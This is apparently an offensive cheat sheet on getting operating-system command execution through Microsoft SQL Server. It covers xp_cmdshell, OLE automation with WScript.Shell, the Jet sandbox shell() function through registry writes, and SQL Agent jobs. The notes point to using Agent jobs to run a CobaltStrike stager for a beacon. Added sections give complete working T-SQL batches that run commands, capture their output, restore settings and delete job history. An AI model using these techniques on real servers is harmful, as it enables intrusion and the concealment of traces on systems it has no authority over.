Summary of command execution methods on MSSQL
Method one: xp_cmdshell
xp_cmdshell 'whoami' (disabled by default; enabling it requires sysadmin)
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
Change the 1 to 0 to disable it again.
If xp_cmdshell has been dropped, it can be restored from xplog70.dll (the DLL must come from a matching SQL Server version and bitness):
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\xplog70.dll'
Method two: SP_OACREATE
When xp_cmdshell has been removed, SP_OACreate (Ole Automation Procedures) can be used instead.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
Execute [this method returns no output]:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\ /c whoami >d:\\temp\\1.txt'
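Because sp_OAMethod returns nothing from the spawned process, the usual approach is to redirect output to a file and read the file back. The batch below is an added example (not from the original notes) that does both in one step: it runs `cmd.exe /c` with `WScript.Shell.Run` set to wait for completion, releases the COM object, and reads the file through OPENROWSET(BULK ...). It assumes Ole Automation Procedures is already enabled, the caller is sysadmin, and the directory C:\Temp exists and is writable by the SQL Server service account; the file name and command are placeholders.

```sql
-- Added example: run a command via OLE automation and read its output back.
-- Assumes 'Ole Automation Procedures' = 1, sysadmin, and a writable C:\Temp.
DECLARE @shell INT, @hr INT;

EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr <> 0
BEGIN
    RAISERROR('sp_OACreate failed, HRESULT 0x%x', 16, 1, @hr);
    RETURN;
END;

-- Run(strCommand, intWindowStyle, bWaitOnReturn):
--   0 = hidden window, 1 = wait, so the file is complete before we read it.
--   2>&1 captures stderr too, which is where "access denied" style failures land.
EXEC @hr = sp_OAMethod @shell, 'Run', NULL,
    'cmd.exe /c whoami > C:\Temp\out.txt 2>&1', 0, 1;
IF @hr <> 0
    RAISERROR('Run failed, HRESULT 0x%x', 16, 1, @hr);

EXEC sp_OADestroy @shell;   -- always release the COM object

-- Read the result. BULK needs ADMINISTER BULK OPERATIONS, not
-- 'Ad Hoc Distributed Queries', so it works even when OPENROWSET providers are off.
SELECT BulkColumn AS command_output
FROM OPENROWSET(BULK 'C:\Temp\out.txt', SINGLE_CLOB) AS f;
```

Passing `1` for bWaitOnReturn is the detail that makes this reliable; without it the SELECT can run before cmd.exe has written anything and return an empty or missing file.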
Method three: execute commands through the Jet sandbox
Enable the sandbox (the key lives in the registry, so xp_regwrite is used):
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Use jet.oledb to run a command:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("CMD命令")')
However, once c:\Windows\System32\ias\dnary.mdb or c:\Windows\System32\ias\ias.mdb has been deleted, the command no longer works.
So create a database with the following statements (the database name here is l; the .xml extension is arbitrary and does not affect use):
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data l'
Then call l through jet.oledb to run system commands:
select * from openrowset('microsoft.jet.oledb.4.0',';l','select shell("CMD命令")')
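The steps above leave two prerequisites implicit: OPENROWSET against an OLE DB provider requires 'Ad Hoc Distributed Queries' to be on, and the Microsoft.Jet.OLEDB.4.0 provider exists only as a 32-bit component, so this path is unavailable on a 64-bit instance. The batch below is an added example (not from the original notes) that puts the whole procedure in one place: it enables ad hoc queries, records the current SandBoxMode with xp_regread so it can be restored, flips it to 1, runs the shell() call, and puts both settings back. It assumes a 32-bit instance, sysadmin rights, that c:\windows\system32\ias\ias.mdb still exists, and a writable c:\temp; the command is a placeholder.

```sql
-- Added example: full Jet sandbox flow with prerequisites and restore.
-- Assumes 32-bit SQL Server (Jet 4.0 has no 64-bit build), sysadmin,
-- an existing c:\windows\system32\ias\ias.mdb, and a writable c:\temp.
EXEC sp_configure 'show advanced options', 1;   RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE;  -- OPENROWSET needs this

-- Remember the current sandbox value so it can be put back afterwards.
DECLARE @old_mode INT;
EXEC master..xp_regread
    @rootkey    = 'HKEY_LOCAL_MACHINE',
    @key        = 'SOFTWARE\Microsoft\Jet\4.0\Engines',
    @value_name = 'SandBoxMode',
    @value      = @old_mode OUTPUT;

-- 1 = sandbox disabled for non-Access applications, which allows shell().
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1;

-- shell() in Jet is asynchronous and returns a task id, not the output,
-- so redirect to a file and read it separately.
SELECT * FROM OPENROWSET('microsoft.jet.oledb.4.0',
    ';database=c:\windows\system32\ias\ias.mdb',
    'select shell("cmd.exe /c whoami > c:\temp\jet.txt")');

-- Restore the previous sandbox mode and the server option.
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', @old_mode;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;   RECONFIGURE;
```

The number returned by the SELECT is the Windows process id from shell(), which is a convenient confirmation that the provider loaded and the sandbox check passed even before the output file is inspected.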
Method four: execute commands through an Agent Job
Enable SQL Server Agent and create a job; this returns no output, so the usual use is running a CobaltStrike-generated PowerShell stager to get a beacon.
USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command =
In real engagements the payload must be fully encoded, otherwise character-encoding errors will make it fail. Reference link:
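The fragment above stops at @command and omits two steps without which the job is created but never executes: sp_add_jobserver, which binds the job to the local server, and sp_start_job, which actually runs it. The batch below is an added example (not from the original notes) showing the complete sequence, a way to confirm the result from msdb.dbo.sysjobhistory, and cleanup. It assumes the SQL Server Agent service is running, the caller is sysadmin, and a writable C:\Temp; the job name, step name and PowerShell command are placeholders.

```sql
-- Added example: complete Agent job lifecycle for running a PowerShell command.
-- Assumes the Agent service is running, sysadmin, and a writable C:\Temp.
USE msdb;
DECLARE @job NVARCHAR(128) = N'example_ps_job';

EXEC dbo.sp_add_job
    @job_name = @job;

EXEC dbo.sp_add_jobstep
    @job_name  = @job,
    @step_name = N'run_ps',
    @subsystem = N'PowerShell',            -- N'CmdExec' for a plain cmd.exe line
    @command   = N'whoami | Out-File C:\Temp\agent.txt';

-- Without a job server the job exists but is never scheduled or started.
EXEC dbo.sp_add_jobserver
    @job_name    = @job,
    @server_name = N'(local)';

EXEC dbo.sp_start_job @job_name = @job;   -- runs asynchronously as the Agent account

-- Give it a few seconds, then read the job outcome row (step_id = 0).
WAITFOR DELAY '00:00:05';
SELECT j.name, h.run_status, h.run_date, h.run_time, h.message
FROM dbo.sysjobhistory AS h
JOIN dbo.sysjobs       AS j ON j.job_id = h.job_id
WHERE j.name = @job AND h.step_id = 0;   -- run_status 1 = succeeded, 0 = failed

-- Remove the job (also deletes its history).
EXEC dbo.sp_delete_job @job_name = @job;
```

The step runs under the SQL Server Agent service account, not the SQL Server engine account, which matters when the two are configured differently. Because @command is an NVARCHAR string, any quoting inside the PowerShell is exposed to T-SQL quoting rules, which is the reason the notes recommend a fully encoded payload.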